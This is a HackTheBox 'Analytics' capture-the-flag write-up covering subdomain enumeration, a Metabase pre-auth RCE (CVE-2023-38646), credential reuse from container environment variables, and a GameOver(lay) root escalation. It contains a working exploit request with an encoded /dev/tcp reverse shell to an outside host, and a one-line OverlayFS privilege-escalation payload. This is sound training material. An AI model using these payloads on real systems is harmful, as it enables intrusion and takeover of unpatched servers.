Introduction
Hackthebox analytics begins with a webserver running a Metabase instance. A pre-authentication Remote Code Execution (RCE) exploit can be leveraged by leaking a setup token, initiating the server setup process, and injecting into the configuration to achieve code execution. Once inside the Metabase container, credentials stored in environment variables can be extracted and used to gain access to the host. From there, the GameOver(lay) vulnerability will be exploited to obtain a root shell, accompanied by a video demonstration explaining the exploit.
Open Source Intelligence (OSINT) Study Notes
HackTheBox Analytics Description
Analytics is an easy difficulty Linux machine with exposed HTTP and SSH services. Enumeration of the website reveals a `Metabase` instance, which is vulnerable to Pre-Authentication Remote Code Execution (`[CVE-2023-38646](https://nvd.nist.gov/vuln/detail/CVE-2023-38646)`), which is leveraged to gain a foothold inside a Docker container. Enumerating the Docker container we see that the environment variables set contain credentials that can be used to SSH into the host. Post-exploitation enumeration reveals that the kernel version that is running on the host is vulnerable to `GameOverlay`, which is leveraged to obtain root privileges.
Enumeration
Nmap scan has shown the following ports below:
motasem@kali$ nmap -p- 10.10.11.233
Nmap scan report for 10.10.11.233
Host is up (0.12s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
motasem@kali$ nmap -p 22,80 -sCV 10.10.11.233
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Subdomain Enumeration
When we try to access the page via the IP address, the server responds with a 302 redirect to http://analytical.htb. Visiting that URL successfully loads the page, which indicates the server uses host-based routing. To investigate further, we’ll use ffuf to test for subdomains of analytical.htb with the following options:
-u http://10.10.11.233: Specifies the URL to test.-H "Host: FUZZ.analytical.htb": Sets the Host HTTP header. The server performs routing based on this header, andFUZZwill be replaced by each entry in the provided wordlist.-w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt: Points to the wordlist to use. The top 20,000 subdomains should provide a good balance between coverage and speed, running in approximately one minute.-mc all: Matches on all HTTP response codes.-ac: Enables smart filtering to detect the default response and exclude similar responses, highlighting unique ones.
ffuf -u http://10.10.11.233 -H "Host: FUZZ.analytical.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
data [Status: 200, Size: 77883, Words: 3574, Lines: 28, Duration: 187ms]
This indicates that data.analytical.htb provides a different response so we proceed and add it to the hosts file
Metabase Exploitation
Metabase Analytics refers to the use of the Metabase platform, an open-source business intelligence (BI) and data visualization tool, for analyzing and understanding data. Metabase provides a user-friendly interface for querying, visualizing, and sharing insights derived from data stored in databases. It is designed to be accessible to both technical and non-technical users, making data analytics more collaborative and efficient across organizations.
This website at data.analytical.htb provides access to a login page for an instance of the open-source data analytics platform, Metabase.
Exploiting CVE-2023-38646
CVE-2023-38646 is a critical security vulnerability affecting Metabase, an open-source business intelligence tool. This flaw allows unauthenticated attackers to execute arbitrary commands on the server with the server’s privilege level. The vulnerability is present in Metabase open-source versions before 0.46.6.1 and Enterprise versions before 1.46.6.1.
National Vulnerability Database
Details of the Vulnerability:
The issue arises from improper handling of the setup token and database connection strings during the initial setup process. Attackers can exploit this by accessing the /api/session/properties endpoint to retrieve the setup-token, which remains accessible even after the setup process is complete. Using this token, they can send specially crafted requests to the /api/setup/validate endpoint, injecting malicious database connection strings that lead to remote code execution without requiring authentication.
There are numerous exploits available that I could find with a quick search, but this one is straightforward enough for me to tackle manually to fully grasp its functionality.
Accessing /api/session/properties yields a large JSON response. We should be aware that a setup-token is included within it. To narrow it down, we’ll use jq to view the top-level keys. Out of the 60 keys present, setup-token is indeed one of them:
motasem@kali$ curl data.analytical.htb/api/session/properties -s | jq '. | keys | .[]' | wc -l
60
motasem@kali$ curl data.analytical.htb/api/session/properties -s | jq -r '. | keys | .[]' | grep setup-token
setup-token
motasem@kali$ curl data.analytical.htb/api/session/properties -s | jq -r '."setup-token"'
249fa03d-fd94-4d5b-b94f-b4ebf3df681f
The blog post demonstrates using an HTTP POST request as part of an exploit.
POST /api/setup/validate HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 812
{
"token": "5491c003-41c2-482d-bab4-6e174aa1738c",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
We’ll need to update the token in the request. There’s a command embedded in the database key that runs bash -c, which echoes some base64-encoded data, decodes it with base64 -d, and pipes it into bash -i. It also uses brace expansion to handle spaces.
motasem@kali$ echo 'bash -i >& /dev/tcp/10.10.16.3/4545 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zLzQ1NDUgMD4mMQ==
To match the format, I’ll create a bash reverse shell command. While it’s not absolutely necessary, I’ll clean up the command by adding spaces to eliminate special characters.
motasem@kali$ echo 'bash -i >& /dev/tcp/10.10.16.3/4545 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMy80NTQ1IDA+JjE=
motasem@kali$ echo 'bash -i >& /dev/tcp/10.10.16.3/4545 0>&1 ' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMy80NTQ1IDA+JjEg
The resulting database string will be structured like this: With nc listening on port 443, we’ll capture a request to data.analytics.htb in Burp Suite and send it to the Repeater tool. The specifics of the request don’t matter much since we’ll modify it completely; we just need the correct target set. In the Request pane, we’ll update the Host header to data.analytics.htb, adjust the token, and insert the modified database string.
motasem@kali$ nc -lnvp 443
b7ed0bb2dd1e:/$
Linux Privilege Escalation
The file system is quite minimal. Metabase is located in the /app directory.
b7ed0bb2dd1e:/$ ls /app
certs
metabase.jar
run_metabase.sh
Running the env command reveals the environment variables, where the following stand out:
b7ed0bb2dd1e:/$ env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=b7ed0bb2dd1e
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/usr/bin/env
OLDPWD=/
META_USER=metalytics and META_PASS=An4lytics_ds20223#.
The provided password successfully allows SSH access to the host machine as the metalytics user.
motasem@kali$ sshpass -p 'An4lytics_ds20223#' ssh metalytics@analytical.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)
...[snip],...
metalytics@analytics:~$
The operating system, as mentioned earlier, is Ubuntu 22.04, and the kernel version is:
metalytics@analytics:/$ cat /etc/os-release
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
metalytics@analytics:/$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu
Searching for the kernel version alongside the term “vulnerability” yields numerous references to GameOver(lay).
Exploiting GameOver lay in Ubuntu | CVE-2023-2640 and CVE-2023-32629
CVE-2023-2640 and CVE-2023-32629 are high-severity local privilege escalation vulnerabilities in Ubuntu’s OverlayFS module, collectively referred to as “GameOver(lay).” These flaws allow unprivileged users to gain elevated privileges on affected systems.
CVE-2023-2640: This vulnerability arises from Ubuntu-specific modifications to OverlayFS that permit unprivileged users to set privileged extended attributes on mounted files without proper security checks. An attacker can exploit this to assign elevated capabilities to files, potentially leading to unauthorized privilege escalation.
CVE-2023-32629: This flaw involves the ovl_copy_up_meta_inode_data function in OverlayFS, which skips necessary permission checks when invoking ovl_do_setxattr. This oversight enables attackers to craft executable files with scoped file capabilities that, when manipulated, can grant root-like privileges upon execution.
Affected Systems: These vulnerabilities impact various Ubuntu versions, including 22.04 LTS (Jammy Jellyfish) and 23.04 (Lunar Lobster), particularly those running kernel versions 5.19.0 and 6.2.0. Approximately 40% of Ubuntu users are estimated to be affected.
Exploitation and Impact: Exploiting these vulnerabilities allows local attackers to gain root privileges, posing significant security risks, especially in multi-user environments and containerized applications. Notably, these flaws can be exploited within containers to achieve container root access, potentially leading to container escapes and broader system compromises
To exploit it, run the below payload:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; id")'
This code executes the id command with elevated privileges, and running it outputs a user ID associated with the root account.
metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; id")'
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; bash")'
root@analytics:~#
Done
